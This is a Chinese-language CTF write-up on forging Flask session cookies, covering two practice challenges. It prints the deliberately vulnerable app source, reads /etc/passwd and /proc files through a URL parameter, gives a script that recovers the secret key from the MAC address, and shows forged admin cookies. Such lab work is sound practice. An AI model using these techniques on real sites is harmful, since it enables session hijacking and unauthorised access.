flask_session伪造

First Post:

Last Update:

flask_session伪造

1
python3 session_encode.py encode -s 'secret_key' -t "{内容}"
1
python3 session_decode.py (session)

session伪造工具:https://github.com/noraj/flask-session-cookie-manager

[CISCN2019 华东南赛区]Web41

url参数返回了百度的页面 猜测存在任意文件读取,尝试读取文件/etc/passwd
image-20221206193718939

查看当前进程:/proc/self/cmdline

image-20221206193921037

是python的后台,源码在app.py里面,尝试读取源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
encoding:utf-8

import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

andom指定了seed那么生成的随机数是固定的

image-20221206194524486

/sys/class/net/eth0/address 获得mac地址

1
2
3
4
5
6
7
8
9
10
11
12
import uuid
import random

mac = "e6:5c:db:61:4f:fb"
temp = mac.split(':')
temp = [int(i,16) for i in temp]
temp = [bin(i).replace('0b','').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp,2)
random.seed(mac)
randStr = str(random.random()*233)
print(randStr)
1
2
python3 session_decode.py eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.Y48pCw.jSI45FJchx1e5pmIMuxPxvo4m9E
{'username': b'www-data'}
1
2
python3 session_encode.py encode -s '204.939020002' -t "{'username': b'fuck'}"
eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.Z8AaaQ.PN1VAO71jMvkoNTMlg0JYHtYTV8

传入eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.Z8AaaQ.PN1VAO71jMvkoNTMlg0JYHtYTV8得flag

[HCTF 2018]admin

先注册一个账号aaa,得到

1
session=.eJw9kEGPgjAQhf_KZs4eoMrFxANJNVmTGVK30LQXg4hAATcBDVLjf9_GTTy_fN97M084XoZyrGF9G-7lAo7NGdZP-DrBGhIlnJFZS0xEhrcz9oeOmKm13dXEW4cs6xL5HZDrauxFSHzXGZUyo8QKrQ4SWay09JzcWeT7TssiQm4sMvEwsp2IpY54NWt37tBul6RMjzaeNcOH5yJjY6ddPGlZhZqJ0PAqJHbw3WJCee79vgBd5bntBl4LKMbhcrz9tuX1c4K2RaBdOhsrpkRtvSJriGFEViz9ZKflvklU5uvjJSqcydU1xZu3runzqvyYfmx2KKv_5Jr3PoA8z2EB97Ec3l-DMIDXH43ebGs.Z8AbCQ.IxiAnlonqkJOfwl9qXOTT_o8-v4

解码为

1
{'_fresh': True, '_id': b'9d3e5d7d9d922de7fab1a4933ee92479a2d541eee6ed8264978a9211c02ea7906c3d1e907e3482c7e2175ff202cc1a99f03c00a85cd5d857da44017f9d43875a', 'csrf_token': b'b74c52f409a5d5b7c96472d3a2b9ee2071c278a4', 'image': b'J5Qz', 'name': 'aaa', 'user_id': '10'}

修改aaa为admin,在文件中找到secret_key为ckj123,编码

1
.eJw9kEGLwjAQhf_KMmcPbbQXwUMhCivMlLixIbmItrVt2rhQldqI_32DC54f3_fezBMO56G6NrC8DfdqBoe2hOUTvk6whEwJb2TeEROJ4d2EbtcTM422m4Z455HlfSa_I_J9g07ExDe9UXtmlFig1VEmi4WWgZMbi3zba1kkyI1FJh5GdiOxvSdeT9qXPdr1nJRxaNNJM3wELjE29dqno5Z1rJmIDa9jYrvQLUaUpQv7IvR14NYreM2guA7nw-23qy6fE7QtIu33k7FizNQ6KPKWGCZkxTxM9lpu20zloT6do8KJfNNQunrrWnesq4_px-a7qv5PLkcXAjiWrr3ADO7Xanj_DeIIXn9tx21R.Z8Abxg.LkGVETvcR5s0IX3YFx0FXKI5hoY

主页替换session,得到flag